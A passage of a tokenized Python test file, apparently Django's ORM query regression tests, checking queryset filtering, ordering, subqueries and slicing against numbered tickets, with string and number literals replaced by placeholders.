name__in = ( ) ) . update ( name = "<STR_LIT:foo>" ) , <NUM_LIT:0> ) <EOL> def test_ticket10432 ( self ) : <EOL> def f ( ) : <EOL> return iter ( [ ] ) <EOL> n_obj = Note . objects . all ( ) [ <NUM_LIT:0> ] <EOL> def g ( ) : <EOL> for i in [ n_obj . pk ] : <EOL> yield i <EOL> self . assertQuerysetEqual ( Note . objects . filter ( pk__in = f ( ) ) , [ ] ) <EOL> self . assertEqual ( list ( Note . objects . filter ( pk__in = g ( ) ) ) , [ n_obj ] ) <EOL> def test_ticket10742 ( self ) : <EOL> subq = Author . objects . filter ( num__lt = <NUM_LIT> ) <EOL> qs = Author . objects . filter ( pk__in = subq ) <EOL> self . assertQuerysetEqual ( qs , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertTrue ( subq . _result_cache is None ) <EOL> subq = Author . objects . filter ( num__lt = <NUM_LIT> ) <EOL> qs = Author . objects . exclude ( pk__in = subq ) <EOL> self . assertQuerysetEqual ( qs , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertTrue ( subq . _result_cache is None ) <EOL> subq = Author . objects . filter ( num__lt = <NUM_LIT> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( Q ( pk__in = subq ) & Q ( name = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertTrue ( subq . _result_cache is None ) <EOL> def test_ticket7076 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . exclude ( modified = self . time1 ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . exclude ( parent__name = self . t1 . name ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket7181 ( self ) : <EOL> self . assertEqual ( len ( Tag . objects . order_by ( '<STR_LIT>' ) ) , <NUM_LIT:5> ) <EOL> self . assertQuerysetEqual ( <EOL> Note . objects . none ( ) | Note . objects . all ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Note . objects . all ( ) | Note . objects . none ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( Note . objects . none ( ) & Note . objects . all ( ) , [ ] ) <EOL> self . assertQuerysetEqual ( Note . objects . all ( ) & Note . objects . none ( ) , [ ] ) <EOL> def test_ticket9411 ( self ) : <EOL> qs = Tag . objects . values_list ( '<STR_LIT:id>' , flat = True ) . order_by ( '<STR_LIT:id>' ) <EOL> qs . query . bump_prefix ( ) <EOL> first = qs [ <NUM_LIT:0> ] <EOL> self . assertEqual ( list ( qs ) , range ( first , first + <NUM_LIT:5> ) ) <EOL> def test_ticket8439 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( Q ( item__note__extrainfo = self . e2 ) | Q ( report = self . r1 , name = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( Q ( report = self . r1 , name = '<STR_LIT>' ) | Q ( item__note__extrainfo = self . e2 ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Annotation . objects . filter ( Q ( tag__parent = self . t1 ) | Q ( notes__note = '<STR_LIT>' , name = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> xx = ExtraInfo . objects . create ( info = '<STR_LIT>' , note = self . n3 ) <EOL> self . assertQuerysetEqual ( <EOL> Note . objects . filter ( Q ( extrainfo__author = self . a1 ) | Q ( extrainfo = xx ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> xx . delete ( ) <EOL> q = Note . objects . filter ( Q ( extrainfo__author = self . a1 ) | Q ( extrainfo = xx ) ) . query <EOL> self . assertEqual ( <EOL> len ( [ x [ <NUM_LIT:2> ] for x in q . alias_map . values ( ) if x [ <NUM_LIT:2> ] == q . LOUTER and q . alias_refcount [ x [ <NUM_LIT:1> ] ] ] ) , <EOL> <NUM_LIT:1> <EOL> ) <EOL> class Queries2Tests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> Number . objects . create ( num = <NUM_LIT:4> ) <EOL> Number . objects . create ( num = <NUM_LIT:8> ) <EOL> Number . objects . create ( num = <NUM_LIT:12> ) <EOL> def test_ticket4289 ( self ) : <EOL> self . assertQuerysetEqual ( Number . objects . filter ( num__lt = <NUM_LIT:4> ) , [ ] ) <EOL> self . assertQuerysetEqual ( Number . objects . filter ( num__gt = <NUM_LIT:8> , num__lt = <NUM_LIT:12> ) , [ ] ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__gt = <NUM_LIT:8> , num__lt = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( Q ( num__lt = <NUM_LIT:4> ) | Q ( num__gt = <NUM_LIT:8> , num__lt = <NUM_LIT:12> ) ) , <EOL> [ ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( Q ( num__gt = <NUM_LIT:8> , num__lt = <NUM_LIT:12> ) | Q ( num__lt = <NUM_LIT:4> ) ) , <EOL> [ ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( Q ( num__gt = <NUM_LIT:8> ) & Q ( num__lt = <NUM_LIT:12> ) | Q ( num__lt = <NUM_LIT:4> ) ) , <EOL> [ ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( Q ( num__gt = <NUM_LIT:7> ) & Q ( num__lt = <NUM_LIT:12> ) | Q ( num__lt = <NUM_LIT:4> ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket12239 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__gt = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( Number . objects . filter ( num__gt = <NUM_LIT:12> ) , [ ] ) <EOL> self . assertQuerysetEqual ( Number . objects . filter ( num__gt = <NUM_LIT> ) , [ ] ) <EOL> self . assertQuerysetEqual ( Number . objects . filter ( num__gt = <NUM_LIT> ) , [ ] ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__lt = <NUM_LIT:12> ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__lt = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__lt = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__gte = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__gte = <NUM_LIT:12> ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__gte = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( Number . objects . filter ( num__gte = <NUM_LIT> ) , [ ] ) <EOL> self . assertQuerysetEqual ( Number . objects . filter ( num__gte = <NUM_LIT> ) , [ ] ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__lte = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__lte = <NUM_LIT:12> ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__lte = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__lte = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__lte = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket7411 ( self ) : <EOL> for num in range ( <NUM_LIT:2> * ITER_CHUNK_SIZE + <NUM_LIT:1> ) : <EOL> _ = Number . objects . create ( num = num ) <EOL> for i , obj in enumerate ( Number . objects . all ( ) ) : <EOL> obj . save ( ) <EOL> if i > <NUM_LIT:10> : break <EOL> def test_ticket7759 ( self ) : <EOL> count = Number . objects . count ( ) <EOL> qs = Number . objects . all ( ) <EOL> def run ( ) : <EOL> for obj in qs : <EOL> return qs . count ( ) == count <EOL> self . assertTrue ( run ( ) ) <EOL> class Queries3Tests ( BaseQuerysetTest ) : <EOL> def test_ticket7107 ( self ) : <EOL> self . assertQuerysetEqual ( Valid . objects . all ( ) , [ ] ) <EOL> def test_ticket8683 ( self ) : <EOL> self . assertRaisesMessage ( <EOL> AssertionError , <EOL> "<STR_LIT>" , <EOL> Item . objects . dates , '<STR_LIT:name>' , '<STR_LIT>' <EOL> ) <EOL> class Queries4Tests ( BaseQuerysetTest ) : <EOL> def setUp ( self ) : <EOL> generic = NamedCategory . objects . create ( name = "<STR_LIT>" ) <EOL> self . t1 = Tag . objects . create ( name = '<STR_LIT>' , category = generic ) <EOL> n1 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:foo>' , id = <NUM_LIT:1> ) <EOL> n2 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:bar>' , id = <NUM_LIT:2> ) <EOL> e1 = ExtraInfo . objects . create ( info = '<STR_LIT>' , note = n1 ) <EOL> e2 = ExtraInfo . objects . create ( info = '<STR_LIT>' , note = n2 ) <EOL> a1 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = e1 ) <EOL> a3 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = e2 ) <EOL> Report . objects . create ( name = '<STR_LIT>' , creator = a1 ) <EOL> Report . objects . create ( name = '<STR_LIT>' , creator = a3 ) <EOL> Report . objects . create ( name = '<STR_LIT>' ) <EOL> def test_ticket7095 ( self ) : <EOL> ManagedModel . objects . create ( data = '<STR_LIT>' , tag = self . t1 , public = True ) <EOL> self . assertEqual ( ManagedModel . objects . update ( data = '<STR_LIT>' ) , <NUM_LIT:1> ) <EOL> if connection . features . interprets_empty_strings_as_nulls : <EOL> expected_null_charfield_repr = u'<STR_LIT>' <EOL> else : <EOL> expected_null_charfield_repr = None <EOL> self . assertValueQuerysetEqual ( <EOL> Report . objects . values_list ( "<STR_LIT>" , flat = True ) . order_by ( "<STR_LIT:name>" ) , <EOL> [ u'<STR_LIT>' , u'<STR_LIT>' , expected_null_charfield_repr ] , <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Report . objects . select_related ( "<STR_LIT>" , "<STR_LIT>" ) . order_by ( "<STR_LIT:name>" ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> d1 = Detail . objects . create ( data = "<STR_LIT>" ) <EOL> d2 = Detail . objects . create ( data = "<STR_LIT>" ) <EOL> m1 = Member . objects . create ( name = "<STR_LIT>" , details = d1 ) <EOL> m2 = Member . objects . create ( name = "<STR_LIT>" , details = d2 ) <EOL> Child . objects . create ( person = m2 , parent = m1 ) <EOL> obj = m1 . children . select_related ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( obj . person . details . data , u'<STR_LIT>' ) <EOL> def test_order_by_resetting ( self ) : <EOL> qs = Author . objects . order_by ( ) . order_by ( '<STR_LIT:name>' ) <EOL> self . assertTrue ( '<STR_LIT>' in qs . query . get_compiler ( qs . db ) . as_sql ( ) [ <NUM_LIT:0> ] ) <EOL> def test_ticket10181 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . filter ( id__in = Tag . objects . filter ( id__in = [ ] ) ) , <EOL> [ ] <EOL> ) <EOL> class Queries5Tests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> n1 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:foo>' , id = <NUM_LIT:1> ) <EOL> n2 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:bar>' , id = <NUM_LIT:2> ) <EOL> e1 = ExtraInfo . objects . create ( info = '<STR_LIT>' , note = n1 ) <EOL> e2 = ExtraInfo . objects . create ( info = '<STR_LIT>' , note = n2 ) <EOL> a1 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = e1 ) <EOL> a2 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = e1 ) <EOL> a3 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = e2 ) <EOL> self . rank1 = Ranking . objects . create ( rank = <NUM_LIT:2> , author = a2 ) <EOL> Ranking . objects . create ( rank = <NUM_LIT:1> , author = a3 ) <EOL> Ranking . objects . create ( rank = <NUM_LIT:3> , author = a1 ) <EOL> def test_ordering ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Ranking . objects . all ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Ranking . objects . all ( ) . order_by ( '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Ranking . objects . extra ( tables = [ '<STR_LIT>' ] , order_by = [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> qs = Ranking . objects . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( <EOL> [ o . good for o in qs . extra ( order_by = ( '<STR_LIT>' , ) ) ] , <EOL> [ True , False , False ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> qs . extra ( order_by = ( '<STR_LIT>' , '<STR_LIT:id>' ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> dicts = qs . values ( '<STR_LIT:id>' , '<STR_LIT>' ) . order_by ( '<STR_LIT:id>' ) <EOL> self . assertEqual ( <EOL> [ d . items ( ) [ <NUM_LIT:1> ] for d in dicts ] , <EOL> [ ( '<STR_LIT>' , <NUM_LIT:2> ) , ( '<STR_LIT>' , <NUM_LIT:1> ) , ( '<STR_LIT>' , <NUM_LIT:3> ) ] <EOL> ) <EOL> def test_ticket7256 ( self ) : <EOL> qs = Ranking . objects . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> dicts = qs . values ( ) . order_by ( '<STR_LIT:id>' ) <EOL> for d in dicts : del d [ '<STR_LIT:id>' ] ; del d [ '<STR_LIT>' ] <EOL> self . assertEqual ( <EOL> [ sorted ( d . items ( ) ) for d in dicts ] , <EOL> [ [ ( '<STR_LIT>' , <NUM_LIT:0> ) , ( '<STR_LIT>' , <NUM_LIT:2> ) ] , [ ( '<STR_LIT>' , <NUM_LIT:0> ) , ( '<STR_LIT>' , <NUM_LIT:1> ) ] , [ ( '<STR_LIT>' , <NUM_LIT:1> ) , ( '<STR_LIT>' , <NUM_LIT:3> ) ] ] <EOL> ) <EOL> def test_ticket7045 ( self ) : <EOL> qs = Ranking . objects . extra ( tables = [ '<STR_LIT>' ] ) <EOL> qs . query . get_compiler ( qs . db ) . as_sql ( ) <EOL> qs . query . get_compiler ( qs . db ) . as_sql ( ) <EOL> def test_ticket9848 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Ranking . objects . filter ( author__name = '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertEqual ( <EOL> Ranking . objects . filter ( author__name = '<STR_LIT>' ) . update ( rank = '<STR_LIT:4>' ) , <EOL> <NUM_LIT:1> <EOL> ) <EOL> r = Ranking . objects . filter ( author__name = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . assertNotEqual ( r . id , r . author . id ) <EOL> self . assertEqual ( r . rank , <NUM_LIT:4> ) <EOL> r . rank = <NUM_LIT:3> <EOL> r . save ( ) <EOL> self . assertQuerysetEqual ( <EOL> Ranking . objects . all ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket5261 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Note . objects . exclude ( Q ( ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> class SelectRelatedTests ( TestCase ) : <EOL> def test_tickets_3045_3288 ( self ) : <EOL> self . assertQuerysetEqual ( X . objects . all ( ) , [ ] ) <EOL> self . assertQuerysetEqual ( X . objects . select_related ( ) , [ ] ) <EOL> class SubclassFKTests ( TestCase ) : <EOL> def test_ticket7778 ( self ) : <EOL> num_celebs = Celebrity . objects . count ( ) <EOL> tvc = TvChef . objects . create ( name = "<STR_LIT>" ) <EOL> self . assertEqual ( Celebrity . objects . count ( ) , num_celebs + <NUM_LIT:1> ) <EOL> Fan . objects . create ( fan_of = tvc ) <EOL> Fan . objects . create ( fan_of = tvc ) <EOL> tvc . delete ( ) <EOL> self . assertEqual ( Celebrity . objects . count ( ) , num_celebs ) <EOL> class CustomPkTests ( TestCase ) : <EOL> def test_ticket7371 ( self ) : <EOL> self . assertQuerysetEqual ( Related . objects . order_by ( '<STR_LIT>' ) , [ ] ) <EOL> class NullableRelOrderingTests ( TestCase ) : <EOL> def test_ticket10028 ( self ) : <EOL> _ = Plaything . objects . create ( name = "<STR_LIT>" ) <EOL> self . assertQuerysetEqual ( <EOL> Plaything . objects . all ( ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> class DisjunctiveFilterTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . n1 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:foo>' , id = <NUM_LIT:1> ) <EOL> ExtraInfo . objects . create ( info = '<STR_LIT>' , note = self . n1 ) <EOL> def test_ticket7872 ( self ) : <EOL> LeafA . objects . create ( data = '<STR_LIT>' ) <EOL> self . assertQuerysetEqual ( LeafA . objects . all ( ) , [ '<STR_LIT>' ] ) <EOL> self . assertQuerysetEqual ( <EOL> LeafA . objects . filter ( Q ( data = '<STR_LIT>' ) | Q ( join__b__data = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket8283 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> ( ExtraInfo . objects . filter ( note = self . n1 ) | ExtraInfo . objects . filter ( info = '<STR_LIT>' ) ) . filter ( note = self . n1 ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> ( ExtraInfo . objects . filter ( info = '<STR_LIT>' ) | ExtraInfo . objects . filter ( note = self . n1 ) ) . filter ( note = self . n1 ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> class Queries6Tests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> generic = NamedCategory . objects . create ( name = "<STR_LIT>" ) <EOL> t1 = Tag . objects . create ( name = '<STR_LIT>' , category = generic ) <EOL> t2 = Tag . objects . create ( name = '<STR_LIT>' , parent = t1 , category = generic ) <EOL> t3 = Tag . objects . create ( name = '<STR_LIT>' , parent = t1 ) <EOL> t4 = Tag . objects . create ( name = '<STR_LIT>' , parent = t3 ) <EOL> t5 = Tag . objects . create ( name = '<STR_LIT>' , parent = t3 ) <EOL> n1 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:foo>' , id = <NUM_LIT:1> ) <EOL> ann1 = Annotation . objects . create ( name = '<STR_LIT>' , tag = t1 ) <EOL> ann1 . notes . add ( n1 ) <EOL> ann2 = Annotation . objects . create ( name = '<STR_LIT>' , tag = t4 ) <EOL> def test_parallel_iterators ( self ) : <EOL> qs = Tag . objects . all ( ) <EOL> i1 , i2 = iter ( qs ) , iter ( qs ) <EOL> self . assertEqual ( repr ( i1 . next ( ) ) , '<STR_LIT>' ) <EOL> self . assertEqual ( repr ( i1 . next ( ) ) , '<STR_LIT>' ) <EOL> self . assertEqual ( repr ( i2 . next ( ) ) , '<STR_LIT>' ) <EOL> self . assertEqual ( repr ( i2 . next ( ) ) , '<STR_LIT>' ) <EOL> self . assertEqual ( repr ( i2 . next ( ) ) , '<STR_LIT>' ) <EOL> self . assertEqual ( repr ( i1 . next ( ) ) , '<STR_LIT>' ) <EOL> qs = X . objects . all ( ) <EOL> self . assertEqual ( bool ( qs ) , False ) <EOL> self . assertEqual ( bool ( qs ) , False ) <EOL> def test_nested_queries_sql ( self ) : <EOL> qs = Annotation . objects . filter ( notes__in = Note . objects . filter ( note = "<STR_LIT>" ) ) <EOL> self . assertEqual ( <EOL> qs . query . get_compiler ( qs . db ) . as_sql ( ) [ <NUM_LIT:0> ] . count ( '<STR_LIT>' ) , <EOL> <NUM_LIT:2> <EOL> ) <EOL> def test_tickets_8921_9188 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> PointerA . objects . filter ( connection__pointerb__id = <NUM_LIT:1> ) , <EOL> [ ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> PointerA . objects . exclude ( connection__pointerb__id = <NUM_LIT:1> ) , <EOL> [ ] <EOL> ) <EOL> list ( Tag . objects . exclude ( children = None ) ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . exclude ( children = None ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . exclude ( parent__annotation__name = "<STR_LIT>" ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Annotation . objects . exclude ( tag__children__name = "<STR_LIT>" ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Annotation . objects . filter ( notes__in = Note . objects . filter ( note = "<STR_LIT>" ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket3739 ( self ) : <EOL> q1 = Tag . objects . order_by ( '<STR_LIT:name>' ) <EOL> self . assertTrue ( q1 is not q1 . all ( ) ) <EOL> class GeneratorExpressionTests ( TestCase ) : <EOL> def test_ticket10432 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Note . objects . filter ( pk__in = ( x for x in ( ) ) ) , <EOL> [ ] <EOL> ) <EOL> class ComparisonTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . n1 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:foo>' , id = <NUM_LIT:1> ) <EOL> e1 = ExtraInfo . objects . create ( info = '<STR_LIT>' , note = self . n1 ) <EOL> self . a2 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = e1 ) <EOL> def test_ticket8597 ( self ) : <EOL> _ = Item . objects . create ( name = "<STR_LIT>" , created = datetime . datetime . now ( ) , creator = self . a2 , note = self . n1 ) <EOL> _ = Item . objects . create ( name = "<STR_LIT>" , created = datetime . datetime . now ( ) , creator = self . a2 , note = self . n1 ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( name__iexact = "<STR_LIT>" ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( name__iexact = "<STR_LIT>" ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( name__istartswith = "<STR_LIT>" ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( name__iendswith = "<STR_LIT>" ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> class ExistsSql ( TestCase ) : <EOL> def setUp ( self ) : <EOL> settings . DEBUG = True <EOL> def test_exists ( self ) : <EOL> self . assertFalse ( Tag . objects . exists ( ) ) <EOL> self . assertTrue ( "<STR_LIT:id>" not in connection . queries [ - <NUM_LIT:1> ] [ '<STR_LIT>' ] and "<STR_LIT:name>" not in connection . queries [ - <NUM_LIT:1> ] [ '<STR_LIT>' ] ) <EOL> def tearDown ( self ) : <EOL> settings . DEBUG = False <EOL> class QuerysetOrderedTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_no_default_or_explicit_ordering ( self ) : <EOL> self . assertEqual ( Annotation . objects . all ( ) . ordered , False ) <EOL> def test_cleared_default_ordering ( self ) : <EOL> self . assertEqual ( Tag . objects . all ( ) . ordered , True ) <EOL> self . assertEqual ( Tag . objects . all ( ) . order_by ( ) . ordered , False ) <EOL> def test_explicit_ordering ( self ) : <EOL> self . assertEqual ( Annotation . objects . all ( ) . order_by ( '<STR_LIT:id>' ) . ordered , True ) <EOL> def test_order_by_extra ( self ) : <EOL> self . assertEqual ( Annotation . objects . all ( ) . extra ( order_by = [ '<STR_LIT:id>' ] ) . ordered , True ) <EOL> def test_annotated_ordering ( self ) : <EOL> qs = Annotation . objects . annotate ( num_notes = Count ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( qs . ordered , False ) <EOL> self . assertEqual ( qs . order_by ( '<STR_LIT>' ) . ordered , True ) <EOL> class SubqueryTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> DumbCategory . objects . create ( id = <NUM_LIT:1> ) <EOL> DumbCategory . objects . create ( id = <NUM_LIT:2> ) <EOL> DumbCategory . objects . create ( id = <NUM_LIT:3> ) <EOL> def test_ordered_subselect ( self ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> query = DumbCategory . objects . filter ( id__in = DumbCategory . objects . order_by ( '<STR_LIT>' ) [ <NUM_LIT:0> : <NUM_LIT:2> ] ) <EOL> self . assertEquals ( set ( query . values_list ( '<STR_LIT:id>' , flat = True ) ) , set ( [ <NUM_LIT:2> , <NUM_LIT:3> ] ) ) <EOL> query = DumbCategory . objects . filter ( id__in = DumbCategory . objects . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:2> ] ) <EOL> self . assertEquals ( set ( query . values_list ( '<STR_LIT:id>' , flat = True ) ) , set ( [ <NUM_LIT:2> , <NUM_LIT:3> ] ) ) <EOL> query = DumbCategory . objects . filter ( id__in = DumbCategory . objects . order_by ( '<STR_LIT>' ) [ <NUM_LIT:2> : ] ) <EOL> self . assertEquals ( set ( query . values_list ( '<STR_LIT:id>' , flat = True ) ) , set ( [ <NUM_LIT:1> ] ) ) <EOL> except DatabaseError : <EOL> self . assertFalse ( connections [ DEFAULT_DB_ALIAS ] . features . allow_sliced_subqueries ) <EOL> def test_sliced_delete ( self ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> DumbCategory . objects . filter ( id__in = DumbCategory . objects . order_by ( '<STR_LIT>' ) [ <NUM_LIT:0> : <NUM_LIT:1> ] ) . delete ( ) <EOL> self . assertEquals ( set ( DumbCategory . objects . values_list ( '<STR_LIT:id>' , flat = True ) ) , set ( [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) <EOL> except DatabaseError : <EOL> self . assertFalse ( connections [ DEFAULT_DB_ALIAS ] . features . allow_sliced_subqueries ) <EOL> class CloneTests ( TestCase ) : <EOL> def test_evaluated_queryset_as_argument ( self ) : <EOL> "<STR_LIT>" <EOL> n = Note ( note = '<STR_LIT>' , misc = '<STR_LIT>' ) <EOL> n . save ( ) <EOL> e = ExtraInfo ( info = '<STR_LIT>' , note = n ) <EOL> e . save ( ) <EOL> n_list = Note . objects . all ( ) <EOL> list ( n_list ) <EOL> try : <EOL> self . assertEquals ( ExtraInfo . objects . filter ( note__in = n_list ) [ <NUM_LIT:0> ] . info , '<STR_LIT>' ) <EOL> except : <EOL> self . fail ( '<STR_LIT>' ) <EOL> class EmptyQuerySetTests ( TestCase ) : <EOL> def test_emptyqueryset_values ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . none ( ) . values ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) , [ ] <EOL> ) <EOL> def test_values_subquery ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( pk__in = Number . objects . none ( ) . values ( "<STR_LIT>" ) ) , <EOL> [ ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( pk__in = Number . objects . none ( ) . values_list ( "<STR_LIT>" ) ) , <EOL> [ ] <EOL> ) <EOL> class ValuesQuerysetTests ( BaseQuerysetTest ) : <EOL> def test_flat_values_lits ( self ) : <EOL> Number . objects . create ( num = <NUM_LIT> ) <EOL> qs = Number . objects . values_list ( "<STR_LIT>" ) <EOL> qs = qs . values_list ( "<STR_LIT>" , flat = True ) <EOL> self . assertValueQuerysetEqual ( <EOL> qs , [ <NUM_LIT> ] <EOL> ) <EOL> class WeirdQuerysetSlicingTests ( BaseQuerysetTest ) : <EOL> def setUp ( self ) : <EOL> Number . objects . create ( num = <NUM_LIT:1> ) <EOL> Number . objects . create ( num = <NUM_LIT:2> ) <EOL> Article . objects . create ( name = 